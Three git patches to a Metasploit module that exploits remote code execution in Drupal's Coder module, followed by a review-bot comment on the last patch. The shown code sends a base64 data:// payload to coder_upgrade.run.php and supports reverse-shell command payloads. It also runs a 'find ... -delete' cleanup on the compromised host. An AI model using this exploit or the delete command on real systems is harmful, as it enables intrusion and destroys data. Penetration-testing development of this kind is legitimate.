From b3402a45f7a8bc53b28bcbf9b30b044a1357941d Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 16 Aug 2016 23:08:09 -0500
Subject: [PATCH 1/3] Add generic payloads

Useful for testing and custom stuff.
---
 modules/exploits/unix/webapp/drupal_coder_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
index 09acc05fcc..ede6cf23e5 100644
--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Compat' => {
 'PayloadType' => 'cmd cmd_bash',
- 'RequiredCmd' => 'netcat netcat-e bash-tcp'
+ 'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
 },
 },
 'Platform' => ['unix'],
From 1f63f8f45bf84f7b55a856dd411d91e14b018b60 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 16 Aug 2016 23:08:53 -0500
Subject: [PATCH 2/3] Don't override payload

pl is a cheap replacement.
---
 modules/exploits/unix/webapp/drupal_coder_exec.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
index ede6cf23e5..d792c03680 100644
--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -87,14 +87,14 @@ class MetasploitModule < Msf::Exploit::Remote
 p << payload.encoded
 p << ' #";s:4:"name";s:4:"test";}}}'
- payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
+ pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
 send_request_cgi(
 'method' => 'GET',
 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
 'encode_params' => false,
 'vars_get' => {
- 'file' => payload
+ 'file' => pl
 }
 )
 end
From 4228868c2955e2935884592a3b42df6400d07e0d Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 16 Aug 2016 23:09:14 -0500
Subject: [PATCH 3/3] Clean up after yourself

Can't use FileDropper. :(
---
 modules/exploits/unix/webapp/drupal_coder_exec.rb | 8 ++++++++
 1 file changed, 8 insertions(+)
diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
index d792c03680..8542736d30 100644
--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -98,4 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
 }
 )
 end
+
+ # XXX: FileDropper can't handle weird filenames
+ def on_new_session(session)
+ # This find command should be decently portable...
+ command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
+ print_status("Cleaning up: #{command}")
+ session.shell_command_token(command)
+ end
 end
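Review bot: The cleanup command in `on_new_session` deletes everything under the session's working directory except `coder_upgrade.run.php`, and the only guard is the `[ -f coder_upgrade.run.php ]` test, so any file already in that directory that the module did not create would presumably be removed too. The comment above the command should state that assumption and the scope, for example `# Assumes the session starts in coder_upgrade/scripts; removes every other entry under it, including subdirectories`. `-delete` is not available in every find implementation, so the "decently portable" remark deserves that caveat, and the return value of `session.shell_command_token` is discarded, so a failed cleanup goes unreported. The override also does not call `super`, which would skip any `on_new_session` handling defined higher in the class hierarchy; adding `super` as the first line of the method would keep that chain intact.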